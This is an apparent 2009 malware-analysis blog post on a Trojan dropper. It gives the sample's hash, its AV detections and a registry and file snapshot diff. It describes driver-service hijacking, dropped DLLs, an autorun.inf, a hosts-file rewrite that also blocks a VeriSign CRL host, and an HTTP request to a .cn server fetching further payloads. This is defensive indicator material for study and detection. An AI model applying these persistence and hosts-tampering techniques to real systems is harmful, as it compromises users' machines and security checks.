Aug 7, 2009

Malware Analysis: Antivirus System PRO


Jun 10, 2009

Malware Analysis: Trojan.Dropper

I received a suspicious file from my colleague yesterday and did a simple behaviour analysis on it. It seems to be a relatively new virus, as major AV tools (such as McAfee, TrendMicro, Kaspersky, F-Secure) were not able to detect it.

Analysis Report:
##############

File: 1.exe
Size: 1033728
MD5: 19AB525B9AF6CBB40F428115E8148522
Virus Found: Trojan.Dropper (Symantec), Win32/Heur (AVG), TR/Crypt.FKM.Gen (AntiVir), Mal/EncPk-EE (Sophos)

On the VirusTotal website, only 20 out of 40 AV engines detected it.

VirusTotal site

Summary:
=======
The Trojan deletes the legitimate PCIDump service entry (a system-start driver in the "PCI Configuration" group) and re-creates it as a demand-start kernel driver (Type 1, Start 3) backed by a newly dropped System32\DRIVERS\pcidump.sys. It overwrites the existing C:\WINDOWS\system32\drivers\acpiec.sys (a copy also appears in the dllcache WFP cache) and registers it as a second kernel-driver service named UPDATEDATA; the LastGood folder and the setupapi.log change are the system's own driver-installation bookkeeping. It copies itself to C:\1.exe together with an autorun.inf in C:\, drops phpi.dll into C:\WINDOWS and func.dll into C:\WINDOWS\system32, and queues a PendingFileRenameOperations entry that deletes drivers\OLD5.tmp at the next reboot.

It overwrites the hosts file with a long block list (mostly .cn domains and raw IP addresses, plus CSC3-2004-crl.verisign.com, the CRL distribution point for VeriSign's Class 3 code-signing CA, so revocation checks on signed code silently fail) and then connects to www.cvbasefwdase.cn over HTTP to fetch /new.txt. It is most likely trying to download further malicious payloads.

Technical Details:
################

Note: the diff below was taken with a snapshot-diff tool (Regshot-style), so it also records changes made by the analysis session itself: the Prefetcher counters, the ShellNoRoam/BagMRU and MUICache entries, the Sysinternals Process Explorer settings and the Cryptography\RNG\Seed value are noise, not sample behaviour.

Registry keys added:
==============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\ControlSet001\Services\pcidump
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control
HKLM\SYSTEM\CurrentControlSet\Services\pcidump
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell

Registry keys deleted:
==============
HKLM\SYSTEM\ControlSet001\Services\PCIDump
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump

Registry values added:
===============
HKLM\SOFTWARE\Microsoft\ESENT\Process\ipconfig\DEBUG\Trace Level: ""
HKLM\SYSTEM\ControlSet001\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\ControlSet001\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\ControlSet001\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\ControlSet001\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Control\Session Manager\PendingFileRenameOperations: 5C 3F 3F 5C 63 3A 5C 77 69 6E 64 6F 77 73 5C 73 79 73 74 65 6D 33 32 5C 64 72 69 76 65 72 73 5C 4F 4C 44 35 2E 74 6D 70 00 00 00
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Control\ActiveService: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Service: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\0000\DeviceDesc: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_PCIDUMP\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\*NewlyCreated*: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Control\ActiveService: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Service: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Legacy: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ConfigFlags: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\Class: "LegacyDriver"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\ClassGUID: "{8ECC055D-047F-11D1-A537-0000F8753ED1}"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\0000\DeviceDesc: "UPDATEDATA"
HKLM\SYSTEM\CurrentControlSet\Enum\Root\LEGACY_UPDATEDATA\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\0: "SW\{b7eafdc0-a680-11d0-96d8-00aa0051e51d}\{9B365890-165F-11D0-A195-0020AFD156E4}"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\0: "Root\LEGACY_PCIDUMP\0000"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\ImagePath: "System32\DRIVERS\pcidump.sys"
HKLM\SYSTEM\CurrentControlSet\Services\pcidump\DisplayName: "pcidump"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\0: "Root\LEGACY_UPDATEDATA\0000"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Security\Security: 01 00 14 80 90 00 00 00 9C 00 00 00 14 00 00 00 30 00 00 00 02 00 1C 00 01 00 00 00 02 80 14 00 FF 01 0F 00 01 01 00 00 00 00 00 01 00 00 00 00 02 00 60 00 04 00 00 00 00 00 14 00 FD 01 02 00 01 01 00 00 00 00 00 05 12 00 00 00 00 00 18 00 FF 01 0F 00 01 02 00 00 00 00 00 05 20 00 00 00 20 02 00 00 00 00 14 00 8D 01 02 00 01 01 00 00 00 00 00 05 0B 00 00 00 00 00 18 00 FD 01 02 00 01 02 00 00 00 00 00 05 20 00 00 00 23 02 00 00 01 01 00 00 00 00 00 05 12 00 00 00 01 01 00 00 00 00 00 05 12 00 00 00
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\Start: 0x00000003
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\ImagePath: "\??\C:\WINDOWS\system32\drivers\acpiec.sys"
HKLM\SYSTEM\CurrentControlSet\Services\UPDATEDATA\DisplayName: "UPDATEDATA"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU:P:\Qbphzragf naq Frggvatf\Bjare\Qrfxgbc\1.rkr: 09 00 00 00 06 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\Bags\34\Shell\FolderType: "MyDocuments"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\@shell32.dll,-12691: "My Recent Documents"
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\MUICache\C:\Documents and Settings\Owner\Desktop\1.exe: "Microsoft ???????"

Registry values deleted:
================
HKLM\SYSTEM\ControlSet001\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\PCIDump\Type: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\ErrorControl: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Group: "PCI Configuration"
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Start: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Tag: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\PCIDump\Type: 0x00000001

Registry values modified:
=================
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: C9 5A 15 C4 25 28 78 C3 EA 94 2F FD E9 49 6F 86 00 EA EC 29 33 E7 A4 37 AE D9 53 A6 3F 7C 0F 9B 7C B4 0C C8 B7 B8 C6 6C 07 CD 75 47 55 88 CC E0 E4 31 36 49 C8 36 EC C6 A7 CD 6C 87 BB 2A 41 42 B9 55 42 B9 53 0C FE 7F 17 BA 4B E4 32 E0 33 4D
HKLM\SOFTWARE\Microsoft\Cryptography\RNG\Seed: 72 0B C5 74 CD 96 F6 DF 3D 2D 96 32 0A 0B CE ED 24 AA AA E6 4B 52 CE B7 C5 99 30 82 1D 4B 31 65 A0 C0 4F 8B B2 E5 FE 0B BE EF A8 61 B8 FD 4B 5C C6 59 F8 9B 2E E8 7C B8 AF 3C EE 3E 34 74 23 78 5D DC 0E E7 05 99 3D D5 4B A3 48 5B 66 6C 8E 38
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000006
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesProcessed: 0x00000014
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x00000002
HKLM\SOFTWARE\Microsoft\Windows NT\CurrentVersion\Prefetcher\TracesSuccessful: 0x0000000A
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\ControlSet001\Services\kmixer\Enum\NextInstance: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\EventMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "c:\windows\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\Eventlog\Application\ESENT\CategoryMessageFile: "C:\WINDOWS\system32\ESENT.dll"
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\Count: 0x00000001
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000000
HKLM\SYSTEM\CurrentControlSet\Services\kmixer\Enum\NextInstance: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 61 00 00 00 A0 22 D9 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_HVFPHG: 09 00 00 00 62 00 00 00 20 EB 67 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9E 00 00 00 40 D7 FC 17 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Explorer\UserAssist\{75048700-EF1F-11D0-9888-006097DEACF9}\Count\HRZR_EHACNGU: 09 00 00 00 9F 00 00 00 F0 8C 78 3B 88 E9 C9 01
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 31 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\CurrentVersion\Internet Settings\Connections\SavedLegacySettings: 46 00 00 00 32 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 00 00 00 00 04 00 00 00 00 00 00 00 B0 A8 11 EE B6 52 C9 01 01 00 00 00 C0 A8 EC 80 00 00 00 00 00 00 00 00 00 00 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 05 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Microsoft\Windows\ShellNoRoam\BagMRU\MRUListEx: 05 00 00 00 00 00 00 00 01 00 00 00 03 00 00 00 07 00 00 00 06 00 00 00 04 00 00 00 02 00 00 00 FF FF FF FF
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF CE 00 00 00 24 00 00 00 26 03 00 00 18 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\Windowplacement: 2C 00 00 00 00 00 00 00 01 00 00 00 00 00 00 00 00 00 00 00 FF FF FF FF FF FF FF FF E6 00 00 00 37 00 00 00 3E 03 00 00 2B 02 00 00
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\SymbolWarningShown: 0x00000001
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000000
HKU\S-1-5-21-1085031214-926492609-839522115-1003\Software\Sysinternals\Process Explorer\DefaultProcPropPage: 0x00000006

Files added:
========
C:\WINDOWS\system32\CatRoot2\tmp.edb
C:\WINDOWS\system32\dllcache\acpiec.sys
C:\WINDOWS\system32\drivers\OLD5.tmp
C:\WINDOWS\system32\drivers\pcidump.sys
C:\WINDOWS\system32\func.dll
C:\WINDOWS\LastGood\system32\drivers\acpiec.sys
C:\WINDOWS\phpi.dll
C:\1.exe
C:\autorun.inf

Files modified:
==========
C:\Documents and Settings\Owner\Cookies\index.dat
C:\Documents and Settings\Owner\Local Settings\History\History.IE5\index.dat
C:\Documents and Settings\Owner\Local Settings\Temporary Internet Files\Content.IE5\index.dat
C:\Documents and Settings\Owner\ntuser.dat.LOG
C:\WINDOWS\Prefetch\CMD.EXE-087B4001.pf
C:\WINDOWS\setupapi.log
C:\WINDOWS\system32\CatRoot2\edb.chk
C:\WINDOWS\system32\CatRoot2\edb.log
C:\WINDOWS\system32\CatRoot2\{F750E6C3-38EE-11D1-85E5-00C04FC295EE}\catdb
C:\WINDOWS\system32\config\default.LOG
C:\WINDOWS\system32\config\software.LOG
C:\WINDOWS\system32\config\system.LOG
C:\WINDOWS\system32\drivers\acpiec.sys
C:\WINDOWS\system32\drivers\etc\hosts

Folder added:
=========
C:\WINDOWS\LastGood
C:\WINDOWS\LastGood\system32
C:\WINDOWS\LastGood\system32\drivers

Other behaviours:
============
>System connecting to www.cvbasefwdase.cn:80
The following HTTP request found:
GET /new.txt HTTP/1.1
Accept: */*
UA-CPU: x86
Accept-Encoding: gzip,deflate
User-Agent: Mozilla/4.0 (compatible; MSIE 7.0; Windows NT 5.1)
Host: www.cvbasefwdase.cn
Connection: Keep-Alive

>System listening on UDP as va9sdhun23.cn:1030 (the listener is on the local machine; the name is most likely an artefact of the monitoring tool reverse-resolving 127.0.0.1 through the modified hosts file, which maps va9sdhun23.cn to 127.0.0.1)

>Running "rundll32.exe" as a process

>Rewrites the hosts file with the following entries:
127.0.0.1 v.onondown.com.cn
127.0.0.2 ymsdasdw1.cn
127.0.0.3 h96b.info
127.0.0.0 fuck.zttwp.cn
127.0.0.0 www.hackerbf.cn
127.0.0.0 geekbyfeng.cn
127.0.0.0 121.14.101.68
127.0.0.0 ppp.etimes888.com
127.0.0.0 www.bypk.com
127.0.0.0 CSC3-2004-crl.verisign.com
127.0.0.1 va9sdhun23.cn
127.0.0.0 udp.hjob123.com
127.0.0.2 bnasnd83nd.cn
127.0.0.0 www.gamehacker.com.cn
127.0.0.0 gamehacker.com.cn
127.0.0.3 adlaji.cn
127.0.0.1 858656.com
127.1.1.1 bnasnd83nd.cn
127.0.0.1 my123.com
127.0.0.0 user1.12-27.net
127.0.0.1 8749.com
127.0.0.0 fengent.cn
127.0.0.1 4199.com
127.0.0.1 user1.16-22.net
127.0.0.1 7379.com
127.0.0.1 2be37c5f.3f6e2cc5f0b.com
127.0.0.1 7255.com
127.0.0.1 user1.23-12.net
127.0.0.1 3448.com
127.0.0.1 www.guccia.net
127.0.0.1 7939.com
127.0.0.1 a.o1o1o1.nEt
127.0.0.1 8009.com
127.0.0.1 user1.12-73.cn
127.0.0.1 piaoxue.com
127.0.0.1 3n8nlasd.cn
127.0.0.1 kzdh.com
127.0.0.0 www.sony888.cn
127.0.0.1 about.blank.la
127.0.0.0 user1.asp-33.cn
127.0.0.1 6781.com
127.0.0.0 www.netkwek.cn
127.0.0.1 7322.com
127.0.0.0 ymsdkad6.cn
127.0.0.1 localhost
127.0.0.0 www.lkwueir.cn
127.0.0.1 06.jacai.com
127.0.1.1 user1.23-17.net
127.0.0.1 1.jopenkk.com
127.0.0.0 upa.luzhiai.net
127.0.0.1 1.jopenqc.com
127.0.0.0 www.guccia.net
127.0.0.1 1.joppnqq.com
127.0.0.0 4m9mnlmi.cn
127.0.0.1 1.xqhgm.com
127.0.0.0 mm119mkssd.cn
127.0.0.1 100.332233.com
127.0.0.0 61.128.171.115:8080
127.0.0.1 121.11.90.79
127.0.0.0 www.1119111.com
127.0.0.1 121565.net
127.0.0.0 win.nihao69.cn
127.0.0.1 125.90.88.38
127.0.0.1 16888.6to23.com
127.0.0.1 2.joppnqq.com
127.0.0.0 puc.lianxiac.net
127.0.0.1 204.177.92.68
127.0.0.0 pud.lianxiac.net
127.0.0.1 210.74.145.236
127.0.0.0 210.76.0.133
127.0.0.1 219.129.239.220
127.0.0.0 61.166.32.2
127.0.0.1 219.153.40.221
127.0.0.0 218.92.186.27
127.0.0.1 219.153.46.27
127.0.0.0 www.fsfsfag.cn
127.0.0.1 219.153.52.123
127.0.0.0 ovo.ovovov.cn
127.0.0.1 221.195.42.71
127.0.0.0 dw.com.com
127.0.0.1 222.73.218.115
127.0.0.1 203.110.168.233:80
127.0.0.1 3.joppnqq.com
127.0.0.1 203.110.168.221:80
127.0.0.1 363xx.com
127.0.0.1 www1.ip10086.com.cm
127.0.0.1 4199.com
127.0.0.1 blog.ip10086.com.cn
127.0.0.1 43242.com
127.0.0.1 www.ccji68.cn
127.0.0.1 5.xqhgm.com
127.0.0.0 t.myblank.cn
127.0.0.1 520.mm5208.com
127.0.0.0 x.myblank.cn
127.0.0.1 59.34.131.54
127.0.0.1 210.51.45.5
127.0.0.1 59.34.198.228
127.0.0.1 www.ew1q.cn
127.0.0.1 59.34.198.88
127.0.0.1 59.34.198.97
127.0.0.1 60.190.114.101
127.0.0.1 60.190.218.34
127.0.0.0 qq-xing.com.cn
127.0.0.1 60.191.124.252
127.0.0.1 61.145.117.212
127.0.0.1 61.157.109.222
127.0.0.1 75.126.3.216
127.0.0.1 75.126.3.217
127.0.0.1 75.126.3.218
127.0.0.0 59.125.231.177:17777
127.0.0.1 75.126.3.220
127.0.0.1 75.126.3.221
127.0.0.1 75.126.3.222
127.0.0.1 772630.com
127.0.0.1 832823.cn
127.0.0.1 8749.com
